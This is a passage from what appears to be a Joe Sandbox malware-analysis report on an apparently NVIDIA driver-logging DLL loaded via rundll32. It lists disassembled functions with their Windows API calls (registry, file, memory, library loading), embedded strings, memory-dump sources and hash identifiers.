                                                                    • Instruction Fuzzy Hash: 1321B03270AB81A2EB20AB61E4843AE7360FF857D0F801235D7AD47A99EF7CD514CB04
                                                                    Function 00007FF8A8D03C94 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03D29
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03D22
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03CF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 71445658-1403648629
                                                                    • Opcode ID: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
                                                                    • Instruction ID: 5143c0ef74e00e47834957335e1877afbf939fce7cb8fcb03c802336269f3205
                                                                    • Opcode Fuzzy Hash: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
                                                                    • Instruction Fuzzy Hash: 4911003270AB46A1FB208B29F44076A6360FB86BE4F404231DA6C077A4CF3CD198CB58
                                                                    Function 00007FF8A8D03FD4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D0407B
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D04074
                                                                    • RegQueryValueEx, xrefs: 00007FF8A8D04049
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID: RegQueryValueEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 3660427363-2563057211
                                                                    • Opcode ID: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
                                                                    • Instruction ID: 366e757239321b43e5727da5d9882871628b33887ef1ef956d6f5dca1b8183e2
                                                                    • Opcode Fuzzy Hash: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
                                                                    • Instruction Fuzzy Hash: 7011DA7161EB42E1EB60CB14E440B6A7371FB857D4F402135E6AE03699DF3CD558CB14
                                                                    Function 00007FF8A8D039B8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00007FF8A8D039FC
                                                                      • Part of subcall function 00007FF8A8D03848: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D038F2
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03915
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03941
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03965
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03989
                                                                      • Part of subcall function 00007FF8A8D13874: throw_exception.LIBCPMT ref: 00007FF8A8D13900
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03A3A
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03A33
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03A08
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$Open__std_exception_copythrow_exception
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 2507522339-1403648629
                                                                    • Opcode ID: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
                                                                    • Instruction ID: a75e7f7cc63999f1758b90fd515add0c717118d1e0b2c520ab682f9af5824add
                                                                    • Opcode Fuzzy Hash: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
                                                                    • Instruction Fuzzy Hash: 27110632B0AA8291EB10CB29E8417A97360FB85BE4F904231DA6D437A4DF3DD556C748
                                                                    Function 00007FF8A8CFA3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CreateHardLinkW$kernel32.dll
                                                                    • API String ID: 1646373207-294928789
                                                                    • Opcode ID: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
                                                                    • Instruction ID: 74473784f85d39109da6c549c6f4153a8fd7fac338affbd60e704392cdabf139
                                                                    • Opcode Fuzzy Hash: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
                                                                    • Instruction Fuzzy Hash: 26D0C938E1BA42F1EB04AB01EC850A423A0FF547C1F800075C44D01320BF3CAA798368
                                                                    Function 00007FF8A8CFA3F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CreateSymbolicLinkW$kernel32.dll
                                                                    • API String ID: 1646373207-1962376091
                                                                    • Opcode ID: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
                                                                    • Instruction ID: 9a799d0084efbb6f22d26fd7d15a45dfa5dacec09c3465527f17687e3e4f51cb
                                                                    • Opcode Fuzzy Hash: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
                                                                    • Instruction Fuzzy Hash: 38D0C278E5BA42E1EB04AB11EC9506823A0FB54792F814175D94D51360AF7CAA7A8728
                                                                    Function 00007FF8A8DBC670 Relevance: 6.1, APIs: 4, Instructions: 126fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 1279197413-0
                                                                    • Opcode ID: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
                                                                    • Instruction ID: 632f0ddb1317518f13870dc4f44dea12b6fada6a51f8cb4a9380ed4d32a9eed3
                                                                    • Opcode Fuzzy Hash: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
                                                                    • Instruction Fuzzy Hash: 3751C272A0A6819AE7109F11E44837AB3A0FB85BE4F104234DBBD07AD5DF3CE4598758
                                                                    Function 00007FF8A8DD0B20 Relevance: 6.1, APIs: 4, Instructions: 81memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562403962-0
                                                                    • Opcode ID: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
                                                                    • Instruction ID: 26835b466dd28e856d933350bf3b699e8b937b42cc378bf2fb1e6cdb96639b96
                                                                    • Opcode Fuzzy Hash: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
                                                                    • Instruction Fuzzy Hash: AF313A32B16A85AAEB20DF35D8407E833A5FB48788F444035DA5E87B44DF3CE656C754
                                                                    Function 00007FF8A8D0BE90 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CastDeallocateDynamicExceptionThrowstd::_std::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 3778945295-0
                                                                    • Opcode ID: 7e8cf4fd689e27e40ec3149a9b23803f5aaded3899b559f1797ed71fe024f5ff
                                                                    • Instruction ID: 33ed3d14e36ca99a81c2f079820001c1f5b45e39316d4de943033c897f19a5b8
                                                                    • Opcode Fuzzy Hash: 7e8cf4fd689e27e40ec3149a9b23803f5aaded3899b559f1797ed71fe024f5ff
                                                                    • Instruction Fuzzy Hash: 2331BC72A1AA41A2EF14CF20E0003B863A1FB94BC4F444836DA6E0779DDF3CD859C764
                                                                    Function 00007FF8A8DBCDC0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_std::locale::_$LocimpLocimp::_LocinfoLockitLockit::~_New_Yarn$GetcvtInitLocinfo::_Locinfo::~_Setgloballocale
                                                                    • String ID:
                                                                    • API String ID: 1900380900-0
                                                                    • Opcode ID: c1beaac3b4cfa616bdd29feecd7804cac1546bf69316845ad3150be0026fdecc
                                                                    • Instruction ID: 1d9da260569bcbd864073547ffef9593c7451454e4929f07eb689abce37378b5
                                                                    • Opcode Fuzzy Hash: c1beaac3b4cfa616bdd29feecd7804cac1546bf69316845ad3150be0026fdecc
                                                                    • Instruction Fuzzy Hash: 76319E31A0AB82E6EB50DB51E44427AB3A0FF84BE0F044135DA6D47B95EF3CE4658328
                                                                    Function 00007FF8A8CFAB70 Relevance: 6.1, APIs: 4, Instructions: 69libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionFreeInfoLibraryLoadLocalMaskVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 3996897175-0
                                                                    • Opcode ID: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
                                                                    • Instruction ID: 0678750c5ee2cb682fd509dcefd710a3c9f91dcb283413b1ab1633fcf3733783
                                                                    • Opcode Fuzzy Hash: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
                                                                    • Instruction Fuzzy Hash: 77210832B1A642EAFF24DB75E8052B57290EF88BC4F044034DA0D87795EF3CE6558B68
                                                                    Function 00007FF8A8D1E4C0 Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LockitLockit::~_std::_$ExceptionThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 2856977306-0
                                                                    • Opcode ID: ecaaf9cd2f149443c18d5738186d43b1eb30e9db4d2f3bac65fca4f3f16b81f2
                                                                    • Instruction ID: 9faf68c0d878837a5d604dbc4cddaaea5a99ca0b932c378ca79e9970e2dd4003
                                                                    • Opcode Fuzzy Hash: ecaaf9cd2f149443c18d5738186d43b1eb30e9db4d2f3bac65fca4f3f16b81f2
                                                                    • Instruction Fuzzy Hash: 12314B62A0EA42A2FA15EB15E4400B86761EF94BE4F580231D66D477A5EF3CE8598328
                                                                    Function 00007FF8A8D57B30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
                                                                    • Instruction ID: 501b9be97b13b1048da7455edf60b81ca6179d6fa604805bc6735885884081f9
                                                                    • Opcode Fuzzy Hash: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
                                                                    • Instruction Fuzzy Hash: AF2181B6B16A8194EF148E12D2401BD7321FB84FC4F24E032DA6D0BB59CF2CD899C304
                                                                    Function 00007FF8A8D60F98 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
